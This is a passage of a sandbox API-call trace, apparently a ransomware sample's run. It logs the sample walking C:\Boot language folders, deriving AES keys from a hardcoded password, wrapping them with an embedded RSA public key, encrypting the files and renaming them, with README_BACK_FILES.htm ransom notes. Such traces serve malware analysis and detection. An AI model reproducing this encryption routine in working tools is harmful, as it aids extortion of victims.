lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.763] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.763] GetLastError () returned 0x12 [0231.763] GetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0231.763] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.763] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.763] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.764] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.764] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.766] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.766] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.766] CryptHashData (hHash=0x2716b68, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.766] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.766] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.766] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.766] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782430) returned 1 [0231.766] CryptImportPublicKeyInfo (in: hCryptProv=0x2782430, dwCertEncodingType=0x1, pInfo=0x277d450*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d480*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d488*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27173e8) returned 1 [0231.766] CryptEncrypt (in: hKey=0x27173e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.766] CryptEncrypt (in: hKey=0x27173e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2782188*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2782188*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.767] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2782188, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.767] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.767] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.767] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.767] CloseHandle (hObject=0xffffffff) returned 1 [0231.767] CloseHandle (hObject=0xffffffff) returned 1 [0231.767] CopyFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.767] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.767] DeleteFileA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.gsg")) returned 0 [0231.768] MoveFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.fuck")) returned 0 [0231.768] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.768] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.768] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.768] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.768] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.768] GetLastError () returned 0x5 [0231.768] GetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui")) returned 0x20 [0231.770] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.771] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.771] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.771] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.771] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.773] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.773] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.773] CryptHashData (hHash=0x2716b68, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.773] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716c68) returned 1 [0231.774] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.774] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.774] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x27824b8) returned 1 [0231.774] CryptImportPublicKeyInfo (in: hCryptProv=0x27824b8, dwCertEncodingType=0x1, pInfo=0x277d930*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d960*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d968*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717128) returned 1 [0231.774] CryptEncrypt (in: hKey=0x2717128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.774] CryptEncrypt (in: hKey=0x2717128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781e58*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781e58*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.775] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781e58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.775] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278d740, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278d740, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.775] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278d740*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278d740*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.775] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278d740, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.775] CloseHandle (hObject=0xffffffff) returned 1 [0231.775] CloseHandle (hObject=0xffffffff) returned 1 [0231.775] CopyFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.775] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.775] DeleteFileA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.gsg")) returned 0 [0231.776] MoveFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.fuck")) returned 0 [0231.776] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.776] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.776] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.776] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.776] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.776] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.777] GetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\tr-tr\\readme_back_files.htm")) returned 0x20 [0231.777] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.777] FindFirstFileA (in: lpFileName="C:\\\\Boot\\uk-UA\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.777] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.777] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.777] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.778] GetLastError () returned 0x12 [0231.778] GetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui")) returned 0x20 [0231.778] SetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.778] CreateFileA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.778] CreateFileA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.778] SetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.778] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.781] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.781] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.781] CryptHashData (hHash=0x2716b68, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.781] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716c68) returned 1 [0231.781] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.781] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.781] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782540) returned 1 [0231.781] CryptImportPublicKeyInfo (in: hCryptProv=0x2782540, dwCertEncodingType=0x1, pInfo=0x277d860*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d890*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d898*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717628) returned 1 [0231.781] CryptEncrypt (in: hKey=0x2717628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.781] CryptEncrypt (in: hKey=0x2717628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781ee0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781ee0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.781] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781ee0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.781] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278d740, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278d740, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.781] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278d740*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278d740*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.782] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278d740, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.782] CloseHandle (hObject=0xffffffff) returned 1 [0231.782] CloseHandle (hObject=0xffffffff) returned 1 [0231.782] CopyFileA (lpExistingFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.782] SetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.782] DeleteFileA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.gsg")) returned 0 [0231.782] MoveFileA (lpExistingFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.fuck")) returned 0 [0231.783] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.783] CryptDestroyKey (hKey=0x2716c68) returned 1 [0231.783] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.783] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.783] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.783] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.783] GetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\README_BACK_FILES.htm" (normalized: "c:\\boot\\uk-ua\\readme_back_files.htm")) returned 0x20 [0231.784] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.784] FindFirstFileA (in: lpFileName="C:\\\\Boot\\zh-CN\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716ce8 [0231.786] FindNextFileA (in: hFindFile=0x2716ce8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.786] FindNextFileA (in: hFindFile=0x2716ce8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.786] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.786] GetLastError () returned 0x12 [0231.786] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0231.787] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.787] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.787] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.787] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.787] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.789] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.789] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.789] CryptHashData (hHash=0x2716aa8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.789] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716aa8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716c68) returned 1 [0231.790] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.790] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.790] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782210) returned 1 [0231.790] CryptImportPublicKeyInfo (in: hCryptProv=0x2782210, dwCertEncodingType=0x1, pInfo=0x277d6c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d6f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d6f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2717228) returned 1 [0231.790] CryptEncrypt (in: hKey=0x2717228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.790] CryptEncrypt (in: hKey=0x2717228, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27825c8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27825c8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.791] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27825c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.791] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2791750, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2791750, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.791] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2791750*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2791750*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.791] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2791750, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.791] CloseHandle (hObject=0xffffffff) returned 1 [0231.791] CloseHandle (hObject=0xffffffff) returned 1 [0231.791] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.791] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.792] DeleteFileA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.gsg")) returned 0 [0231.792] MoveFileA 